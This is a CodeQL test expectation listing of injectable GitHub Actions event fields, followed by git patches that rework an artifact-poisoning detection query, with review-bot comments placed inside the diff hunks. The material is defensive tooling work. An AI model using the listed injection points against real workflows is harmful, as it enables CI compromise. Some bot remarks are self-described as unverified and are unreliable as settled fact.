| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | From f7ddd8b769f64dc375ad140d8f137e3ea3ea822a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:39:50 +0200 Subject: [PATCH 146/707] Include problem queries in actions-all suite --- ql/src/codeql-suites/actions-all.qls | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 8c0f580a7ade..32b9b5800cd5 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -2,4 +2,5 @@ - queries: . - include: kind: - - path-problem + - problem + - path-problem From ce5928c6bac0a49e245ff88503bb37612909bd16 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:43:43 +0200 Subject: [PATCH 147/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e99a12dda08d..f689f38ef527 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.5 +version: 0.0.6 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e37339e16cbc..f2ce850e5b83 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.5 +version: 0.0.6 groups: - actions - queries From 28ccf4fa68ffb178976a679c7ca62f2fee3b2305 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Apr 2024 09:18:01 +0200 Subject: [PATCH 148/707] Improve Artifact Poisoning query --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 9 + .../security/ArtifactPoisoningQuery.qll | 183 ++++++++++++++++-- .../actions/security/EnvVarInjectionQuery.qll | 4 +- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 13 +- ql/test/library-tests/test.expected | 4 + .../.github/workflows/artifactpoisoning11.yml | 41 ++++ ...poisoning1.yml => artifactpoisoning12.yml} | 10 +- ...poisoning3.yml => artifactpoisoning21.yml} | 10 +- ...poisoning2.yml => artifactpoisoning22.yml} | 2 +- .../.github/workflows/artifactpoisoning31.yml | 22 +++ .../.github/workflows/artifactpoisoning32.yml | 21 ++ .../.github/workflows/artifactpoisoning33.yml | 21 ++ .../.github/workflows/artifactpoisoning41.yml | 25 +++ ...poisoning4.yml => artifactpoisoning42.yml} | 4 +- .../.github/workflows/artifactpoisoning51.yml | 24 +++ .../CWE-829/ArtifactPoisoning.expected | 14 +- .../CWE-829/UnpinnedActionsTag.expected | 3 +- 18 files changed, 372 insertions(+), 40 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning1.yml => artifactpoisoning12.yml} (73%) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning3.yml => artifactpoisoning21.yml} (51%) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning2.yml => artifactpoisoning22.yml} (94%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml rename 
ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning4.yml => artifactpoisoning42.yml} (89%)
create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 17768245fdca..720fd29feb0f 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -225,6 +225,8 @@ class Step extends AstNode instanceof StepImpl {
 Env getEnv() { result = super.getEnv() }
 If getIf() { result = super.getIf() }
+
+ Step getAFollowingStep() { result = super.getAFollowingStep() }
 }
 /**
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index 3f9293bc972a..bba5c1a47d34 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -629,6 +629,15 @@ class StepImpl extends AstNodeImpl, TStepNode {
 /** Gets the value of the `if` field in this step, if any. */
 IfImpl getIf() { result.getNode() = n.lookup("if") }
+
+ /** Gets a step that follows this step. */
+ StepImpl getAFollowingStep() {
+ exists(LocalJobImpl job, int i, int j |
+ job.getStep(i) = this and
+ result = job.getStep(j) and
+ i < j
+ )
+ }
 }
 class IfImpl extends AstNodeImpl, TIfNode {
diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
index abf36fd7da34..c64a7d0e3383 100644
--- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
+++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
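Review bot: `getAFollowingStep()` is defined only through `LocalJobImpl.getStep(i)`, so a step whose container is not a `LocalJobImpl` — if composite-action steps (the `action.yml` files the test expectations reference) are modelled differently — has no following steps and the new artifact-poisoning sinks can never fire there; that is worth confirming and stating. The doc comment should also pin the scope, since "follows" here means any later index in the same job, not the immediate successor: `/** Gets a step of the same local job that appears after this step (any later step, not only the next one). */`. `StepImpl`'s body starts outside the hunk.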
@@ -1,13 +1,36 @@
 import actions
-class ArtifactDownloadStep extends Step {
- ArtifactDownloadStep() {
+string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" }
+
+string unzipDirArgRegexp() {
+ result = "-d\\s+\"([^ ]+)\".*" or
+ result = "-d\\s+'([^ ]+)'.*"
+}
+
+abstract class ArtifactDownloadStep extends Step {
+ abstract string getPath();
+}
+
+class Dawidd6ActionDownloadArtifactDownloadStep extends ArtifactDownloadStep, UsesStep {
+ Dawidd6ActionDownloadArtifactDownloadStep() {
 // eg: - uses: dawidd6/action-download-artifact@v2
- this.(UsesStep).getCallee() = "dawidd6/action-download-artifact" and
- // exclude downloads outside the current directory
- // TODO: add more checks to make sure the artifacts can be controlled
- not exists(this.(UsesStep).getArgumentExpr("path"))
- or
+ this.getCallee() = "dawidd6/action-download-artifact" and
+ // An attacker should not be able to push to local branches which `branch` normally is used for.
+ (
+ not exists(this.getArgument("branch")) or
+ not this.getArgument("branch") = ["main", "master"]
+ )
+ }
+
+ override string getPath() {
+ if exists(this.getArgument("path")) then result = this.getArgument("path") else result = ""
+ }
+}
+
+class ActionsGitHubScriptDownloadStep extends ArtifactDownloadStep, UsesStep {
+ string script;
+
+ ActionsGitHubScriptDownloadStep() {
 // eg:
 // - uses: actions/github-script@v6
 // with:
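Review bot: `unzipDirArgRegexp()` only accepts a quoted directory after `-d`, yet the fixtures added in this commit use the unquoted form (`unzip sonarcloud-data.zip -d sonarcloud-data`, `unzip artifact_name.zip -d foo`), so for them `getPath()` degrades to `""` and the sink match rests on the loose `./` fallback rather than on the extracted path; `tar` also takes `-C`/`--directory`, never `-d`. A single pattern such as `result = "-d\\s+[\"']?([^ \"']+)[\"']?.*"` (plus a `-C` twin for tar) keeps the directory at capture group 2 and covers both spellings. The `branch` exclusion in `Dawidd6ActionDownloadArtifactDownloadStep` deserves a caveat too: as far as I recall that action's `pr`, `run_id` and `commit` inputs take precedence over `branch`, so `branch: main` alone does not guarantee the artifact came from a trusted run, and the guard should only apply when none of those inputs is set — worth verifying against the action's README.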
@@ -26,16 +49,79 @@ class ArtifactDownloadStep extends Step {
 // artifact_id: matchArtifact.id,
 // archive_format: 'zip',
 // });
- this.(UsesStep).getCallee() = "actions/github-script" and
- exists(string script |
- this.(UsesStep).getArgument("script") = script and
- script.matches("%listWorkflowRunArtifacts(%") and
- script.matches("%downloadArtifact(%")
+ // var fs = require('fs');
+ // fs.writeFileSync('${{github.workspace}}/test-results.zip', Buffer.from(download.data));
+ this.getCallee() = "actions/github-script" and
+ this.getArgument("script") = script and
+ script.matches("%listWorkflowRunArtifacts(%") and
+ script.matches("%downloadArtifact(%") and
+ script.matches("%writeFileSync%")
+ }
+
+ override string getPath() {
+ if
+ this.getAFollowingStep()
+ .(Run)
+ .getScript()
+ .splitAt("\n")
+ .regexpMatch(unzipRegexp() + unzipDirArgRegexp())
+ then
+ result =
+ this.getAFollowingStep()
+ .(Run)
+ .getScript()
+ .splitAt("\n")
+ .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)
+ else
+ if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp())
+ then result = ""
+ else none()
+ }
+}
+
+class GHRunArtifactDownloadStep extends ArtifactDownloadStep, Run {
+ string script;
+
+ GHRunArtifactDownloadStep() {
+ // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ this.getScript() = script and
+ script.splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") and
+ script.splitAt("\n").matches("%github.event.workflow_run.id%") and
+ (
+ script.splitAt("\n").regexpMatch(unzipRegexp()) or
+ this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp())
 )
- or
- // eg: - run: gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
- this.(Run).getScript().splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*")
- or
+ }
+
+ override string getPath() {
+ if
+ this.getAFollowingStep()
+ .(Run)
+ .getScript()
+
.splitAt("\n")
+ .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or
+ script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp())
+ then
+ result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or
+ result =
+ this.getAFollowingStep()
+ .(Run)
+ .getScript()
+ .splitAt("\n")
+ .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)
+ else
+ if
+ this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or
+ script.splitAt("\n").regexpMatch(unzipRegexp())
+ then result = ""
+ else none()
+ }
+}
+
+class DirectArtifactDownloadStep extends ArtifactDownloadStep, Run {
+ string script;
+
+ DirectArtifactDownloadStep() {
 // eg:
 // run: |
 // artifacts_url=${{ github.event.workflow_run.artifacts_url }}
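Review bot: `GHRunArtifactDownloadStep` insists on an `unzip`/`tar` line in the same or a following step, but `gh run download` already extracts the artifact itself (into the working directory, or into `-D`/`--dir`), so the realistic `gh run download … --dir foo` followed by `./foo/cmd` with no archive step is not matched at all, and `getPath()` never reads `--dir`. I would drop the unzip conjunct from this class's characteristic predicate and add a `result = script.splitAt("\n").regexpCapture(".*gh\\s+run\\s+download.*\\s(-D|--dir)\\s+[\"']?([^ \"']+)[\"']?.*", 2)` alternative to `getPath()`, keeping the unzip-derived path only as a fallback. Requiring the literal `github.event.workflow_run.id` on the same line also drops the `gh run download "${WORKFLOW_RUN_ID}"` spelling that the removed example comment documented, which looks like an unintended regression relative to the old matcher.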
@@ -45,6 +131,69 @@ class ArtifactDownloadStep extends Step {
 // gh api $url > "$name.zip"
 // unzip -d "$name" "$name.zip"
 // done
- this.(Run).getScript().splitAt("\n").matches("%github.event.workflow_run.artifacts_url%")
+ this.getScript() = script and
+ script.splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") and
+ (
+ script.splitAt("\n").regexpMatch(unzipRegexp()) or
+ this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp())
+ )
+ }
+
+ override string getPath() {
+ if
+ script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or
+ this.getAFollowingStep()
+ .(Run)
+ .getScript()
+ .splitAt("\n")
+ .regexpMatch(unzipRegexp() + unzipDirArgRegexp())
+ then
+ result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or
+ result =
+ this.getAFollowingStep()
+ .(Run)
+ .getScript()
+ .splitAt("\n")
+ .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)
+ else result = ""
+ }
+}
+
+abstract class PoisonableStep extends Step { }
+
+class CommandExecutionRunStep extends PoisonableStep, Run {
+ CommandExecutionRunStep() {
+ exists(ArtifactDownloadStep step |
+ step.getAFollowingStep() = this and
+ // Heuristic:
+ // Run step with a command starting with `./xxxx`, `sh xxxx`, `node xxxx`, ...
+ // eg: `./test.sh`, `sh test.sh`, `node test.js`, ...
+ this.getScript()
+ .trim()
+ .regexpMatch(".*(./|(node|python|ruby|sh)\\s+)" + step.getPath() + ".*")
+ )
+ }
+}
+
+predicate writeToGithubEnv(Run run, string key, string value) {
+ exists(string script, string line |
+ script = run.getScript() and
+ line = script.splitAt("\n") and
+ key = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 2) and
+ value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3)
+ )
+}
+
+class EnvVarInjectionRunStep extends PoisonableStep, Run {
+ EnvVarInjectionRunStep() {
+ exists(ArtifactDownloadStep step, string value |
+ step.getAFollowingStep() = this and
+ // Heuristic:
+ // Run step with env var definition based on file content.
+ // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV`
+ writeToGithubEnv(this, _, value) and
+ value.regexpMatch(".*cat\\s+.*")
+ )
 }
 }
+// TODO: Taint Step for output var definition based on file content. eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT`
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
index 330920852c1e..a6d7e1b3cca8 100644
--- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
+++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
@@ -8,8 +8,8 @@ predicate writeToGithubEnvSink(DataFlow::Node exprNode, string key, string value
 exists(Expression expr, Run run, string script, string line |
 script = run.getScript() and
 line = script.splitAt("\n") and
- key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and
- value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and
+ key = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 2) and
+ value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) and
 expr = exprNode.asExpr() and
 run.getAnScriptExpr() = expr and
 value.indexOf(expr.getRawExpression()) > 0
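Review bot: The `CommandExecutionRunStep` pattern `".*(./|(node|python|ruby|sh)\\s+)" + step.getPath() + ".*"` has an unescaped dot in `./`, so that alternative matches any character followed by `/` (`cat foo/bar`, `ls /tmp`, `cd src/`), and `step.getPath()` is spliced in raw, so a path containing `.`, `+`, `(` or `$` rewrites the regex instead of being matched literally. Escaping the dot and quoting the path — `.regexpMatch(".*(\\./|(node|python|ruby|sh)\\s+)\\Q" + step.getPath() + "\\E.*")`, CodeQL regexes following Java syntax where `\Q…\E` quotes — keeps the heuristic's intent without those false positives. Also note that the `step` bound inside this `exists` is independent of the `downloadStep` the query later pairs it with, so once any preceding download matches, every download before this step gets reported, not only the one whose path it executes.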
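Review bot: The tightened regex still requires a bare `$GITHUB_ENV` right after `>>`, so the ShellCheck-recommended `>> "$GITHUB_ENV"` and `>> "${GITHUB_ENV}"` spellings — very common in real workflows — are silently missed, as are multi-line heredoc writes (`{ echo "key<<EOF"; cat file; echo EOF; } >> "$GITHUB_ENV"`). Ending the pattern with `>>\\s*\"?\\$\\{?GITHUB_ENV\\}?\"?` covers the single-line variants; separately, the optional `(\")?` before `>>` is swallowed by the greedy `(.*)`, so `value` keeps a trailing quote when the echo argument is quoted. The identical regex is now duplicated in `writeToGithubEnv` in ArtifactPoisoningQuery.qll; a single shared predicate would stop the two from drifting apart, which is exactly what this hunk is repairing.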
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql
index 5d38faa94df5..bd9ec090f7f9 100644
--- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql
+++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql
@@ -14,13 +14,10 @@ import actions
 import codeql.actions.security.ArtifactPoisoningQuery
-from LocalJob job, ArtifactDownloadStep download, Step run
+from LocalJob job, ArtifactDownloadStep downloadStep, PoisonableStep step
 where
+ // Workflow is privileged
 job.getWorkflow().isPrivileged() and
- (run instanceof Run or run instanceof UsesStep) and
- exists(int i, int j |
- job.getStep(i) = download and
- job.getStep(j) = run and
- i < j
- )
-select download, "Potential artifact poisoning."
+ // Download step is followed by a step that may be poisoned by the download
+ downloadStep.getAFollowingStep() = step
+select downloadStep, "Potential artifact poisoning."
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index a8a0414dd9f9..ea353609e249 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
@@ -351,6 +351,10 @@ sources
 | tj-actions/changed-files | * | output.unknown_files | PR changed files |
 | tj-actions/changed-files | * | output.unmerged_files | PR changed files |
 | tj-actions/verify-changed-files | * | output.changed-files | PR changed files |
+| trilom/file-changes-action | * | output.files | PR changed files |
+| trilom/file-changes-action | * | output.files_added | PR changed files |
